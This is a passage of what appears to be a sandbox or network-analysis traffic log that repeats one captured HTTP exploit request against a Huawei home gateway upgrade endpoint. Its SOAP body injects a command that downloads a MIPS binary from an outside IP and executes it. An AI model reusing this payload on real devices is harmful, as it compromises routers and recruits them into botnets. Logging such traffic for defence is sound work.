6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 